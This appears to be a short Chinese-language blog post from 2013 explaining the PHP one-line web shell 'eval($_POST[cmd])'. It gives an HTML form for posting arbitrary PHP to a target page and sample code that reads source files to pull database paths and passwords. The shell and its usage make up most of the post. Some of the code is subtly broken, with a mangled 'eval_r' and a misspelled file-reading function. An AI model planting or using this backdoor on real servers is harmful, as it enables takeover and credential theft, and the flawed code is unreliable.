加载中…
个人资料
疯狂才子
疯狂才子
  • 博客等级:
  • 博客积分:0
  • 博客访问:2,937
  • 关注人气:30
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

PHP  <?php eval($_POST[cmd]);?>详解

(2013-06-15 09:40:42)
标签:

php

_post

漏洞

黑帽

黑客

分类: cms网站站长

<?php eval_r($_POST[cmd]);?>

执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如:


<form method=post action=http://....../你的名字.php>
<textarea name=cmd>
//这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码
$str=file_get_content('xxx.php');
$str=str_replace('<','&lt;',$str);
echo "<pre>$str</pre>"
</textarea>
<input type=submit>
</form>

0

阅读 收藏 喜欢 打印举报/Report
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

新浪公司 版权所有